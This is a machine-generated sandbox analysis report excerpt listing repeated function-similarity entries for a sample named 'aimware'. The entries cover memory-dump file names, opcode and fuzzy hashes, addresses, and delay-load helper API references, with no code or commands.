Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6251fe2460c0305adf2addcc7d1c4fe5ee11429ffbbb74c389a0497a16ca7d5e
Instruction ID: 9135e6d1f46c3da57b0ee07560171eebfd49ec26d9e94a0f5c38ddaf3614777a
Opcode Fuzzy Hash: 6251fe2460c0305adf2addcc7d1c4fe5ee11429ffbbb74c389a0497a16ca7d5e
Instruction Fuzzy Hash: 24A011E22AA082BC3008A2022E02E3B022CC0C0B203328A2EF802C8080A8803A020830

Function 00ACE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 28af62da9ffa14a8c85e59e07f386b37e9898c14ad71f02713426a9e79928555
Instruction ID: 9135e6d1f46c3da57b0ee07560171eebfd49ec26d9e94a0f5c38ddaf3614777a
Opcode Fuzzy Hash: 28af62da9ffa14a8c85e59e07f386b37e9898c14ad71f02713426a9e79928555
Instruction Fuzzy Hash: 24A011E22AA082BC3008A2022E02E3B022CC0C0B203328A2EF802C8080A8803A020830

Function 00ACE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5ed18939e56cb9a1610d7f3ab856a5b9260765859f5bf4f48215c96f80a78bab
Instruction ID: 9135e6d1f46c3da57b0ee07560171eebfd49ec26d9e94a0f5c38ddaf3614777a
Opcode Fuzzy Hash: 5ed18939e56cb9a1610d7f3ab856a5b9260765859f5bf4f48215c96f80a78bab
Instruction Fuzzy Hash: 24A011E22AA082BC3008A2022E02E3B022CC0C0B203328A2EF802C8080A8803A020830

Function 00ACE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 09a3f80bb2d266bcc0fa499cd140f0b4440f3522a72d5190df7dfc6ec1d60c6e
Instruction ID: 9135e6d1f46c3da57b0ee07560171eebfd49ec26d9e94a0f5c38ddaf3614777a
Opcode Fuzzy Hash: 09a3f80bb2d266bcc0fa499cd140f0b4440f3522a72d5190df7dfc6ec1d60c6e
Instruction Fuzzy Hash: 24A011E22AA082BC3008A2022E02E3B022CC0C0B203328A2EF802C8080A8803A020830

Function 00ACE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e055b2537e1d2888353f4b514cd516c69e00a05f42bb2b72794ac6265a6b38c1
Instruction ID: 9135e6d1f46c3da57b0ee07560171eebfd49ec26d9e94a0f5c38ddaf3614777a
Opcode Fuzzy Hash: e055b2537e1d2888353f4b514cd516c69e00a05f42bb2b72794ac6265a6b38c1
Instruction Fuzzy Hash: 24A011E22AA082BC3008A2022E02E3B022CC0C0B203328A2EF802C8080A8803A020830

Function 00ACE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1646aa11e92821695503ed24e79b51687d940b917404a518b2e3205b18600d99
Instruction ID: 9135e6d1f46c3da57b0ee07560171eebfd49ec26d9e94a0f5c38ddaf3614777a
Opcode Fuzzy Hash: 1646aa11e92821695503ed24e79b51687d940b917404a518b2e3205b18600d99
Instruction Fuzzy Hash: 24A011E22AA082BC3008A2022E02E3B022CC0C0B203328A2EF802C8080A8803A020830

Function 00ACE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d8aa474dfd19704454981774a3c627431a3e62bd5ee0228e3387d88ca4c2be9a
Instruction ID: 9135e6d1f46c3da57b0ee07560171eebfd49ec26d9e94a0f5c38ddaf3614777a
Opcode Fuzzy Hash: d8aa474dfd19704454981774a3c627431a3e62bd5ee0228e3387d88ca4c2be9a
Instruction Fuzzy Hash: 24A011E22AA082BC3008A2022E02E3B022CC0C0B203328A2EF802C8080A8803A020830

Function 00ACE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 571343a458a25ab135990e0ce460cc873360613accfd2f455b1a35e14fc4403c
Instruction ID: 9135e6d1f46c3da57b0ee07560171eebfd49ec26d9e94a0f5c38ddaf3614777a
Opcode Fuzzy Hash: 571343a458a25ab135990e0ce460cc873360613accfd2f455b1a35e14fc4403c
Instruction Fuzzy Hash: 24A011E22AA082BC3008A2022E02E3B022CC0C0B203328A2EF802C8080A8803A020830

Function 00ACE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a3dc60bf88393d18e5879b5ec2f2400df2200e0ee79f5b7273f7b85c920ec914
Instruction ID: 9135e6d1f46c3da57b0ee07560171eebfd49ec26d9e94a0f5c38ddaf3614777a
Opcode Fuzzy Hash: a3dc60bf88393d18e5879b5ec2f2400df2200e0ee79f5b7273f7b85c920ec914
Instruction Fuzzy Hash: 24A011E22AA082BC3008A2022E02E3B022CC0C0B203328A2EF802C8080A8803A020830

Function 00ACE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cc47e9b093d381cdf56de43ca50907cce4d723fd0f0e15bc824f21f4ebb17314
Instruction ID: 9135e6d1f46c3da57b0ee07560171eebfd49ec26d9e94a0f5c38ddaf3614777a
Opcode Fuzzy Hash: cc47e9b093d381cdf56de43ca50907cce4d723fd0f0e15bc824f21f4ebb17314
Instruction Fuzzy Hash: 24A011E22AA082BC3008A2022E02E3B022CC0C0B203328A2EF802C8080A8803A020830

Function 00ACE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE1E3

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 55bb697698f61a1e276613ceafb883e0ffb7685c5f5e428abf7ee485b2db552d
Instruction ID: 9135e6d1f46c3da57b0ee07560171eebfd49ec26d9e94a0f5c38ddaf3614777a
Opcode Fuzzy Hash: 55bb697698f61a1e276613ceafb883e0ffb7685c5f5e428abf7ee485b2db552d
Instruction Fuzzy Hash: 24A011E22AA082BC3008A2022E02E3B022CC0C0B203328A2EF802C8080A8803A020830

Function 00ACE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE3FC

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e2f434fe13940fb68548d5c5345f185c9b8714fd366206bdd93b9b3330761a97
Instruction ID: bfcf88397f4d5c6263ee6915ba9a20ab95c2170d25e1a20af37446642bab9539
Opcode Fuzzy Hash: e2f434fe13940fb68548d5c5345f185c9b8714fd366206bdd93b9b3330761a97
Instruction Fuzzy Hash: 26A022F22AA0C23C3208E3022E03E3B032CC0C0F30332A82EF820E80C0AC802C020833

Function 00ACE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE3FC

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 129e8a390bc3d53794f7d3d30f186da32870db532029bf6f65aafbbd75c7c8ad
Instruction ID: 4c94baece00b2c5d979715435edb782b630e603687dfae89895de42917fc5e2b
Opcode Fuzzy Hash: 129e8a390bc3d53794f7d3d30f186da32870db532029bf6f65aafbbd75c7c8ad
Instruction Fuzzy Hash: 8EA011F22AA0C2BC3208A2022E03E3B022CC0C0B20332A82EF80288080A88028020832

Function 00ACE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE3FC

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 54022a7c0d6a7f813d9601dc26df10f3bb7c91d03ec2dc7df4d6baf86ee4d1f0
Instruction ID: 4c94baece00b2c5d979715435edb782b630e603687dfae89895de42917fc5e2b
Opcode Fuzzy Hash: 54022a7c0d6a7f813d9601dc26df10f3bb7c91d03ec2dc7df4d6baf86ee4d1f0
Instruction Fuzzy Hash: 8EA011F22AA0C2BC3208A2022E03E3B022CC0C0B20332A82EF80288080A88028020832

Function 00ACE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE3FC

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8dbf2cd4398ca383af77d7219349d3ff271f9e3a268e7faebb63eda1eed335b0
Instruction ID: 4c94baece00b2c5d979715435edb782b630e603687dfae89895de42917fc5e2b
Opcode Fuzzy Hash: 8dbf2cd4398ca383af77d7219349d3ff271f9e3a268e7faebb63eda1eed335b0
Instruction Fuzzy Hash: 8EA011F22AA0C2BC3208A2022E03E3B022CC0C0B20332A82EF80288080A88028020832

Function 00ACE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE3FC

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e42ed035749d07f3fcbb1ce83aca7718087a04a97261fed22f0c6a2361a9e892
Instruction ID: 4c94baece00b2c5d979715435edb782b630e603687dfae89895de42917fc5e2b
Opcode Fuzzy Hash: e42ed035749d07f3fcbb1ce83aca7718087a04a97261fed22f0c6a2361a9e892
Instruction Fuzzy Hash: 8EA011F22AA0C2BC3208A2022E03E3B022CC0C0B20332A82EF80288080A88028020832

Function 00ACE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00ACE3FC

Part of subcall function 00ACE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ACE8D0
Part of subcall function 00ACE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ACE8E1

Memory Dump Source

Source File: 00000000.00000002.1663742893.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.1663720481.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663778652.0000000000AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000AF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663800375.0000000000B12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663869388.0000000000B13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_aimware.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 61618d1152fc062a30790f175e2df6c99a5398e2f7967ec267e634476cb54aeb
Instruction ID: 4c94baece00b2c5d979715435edb782b630e603687dfae89895de42917fc5e2b
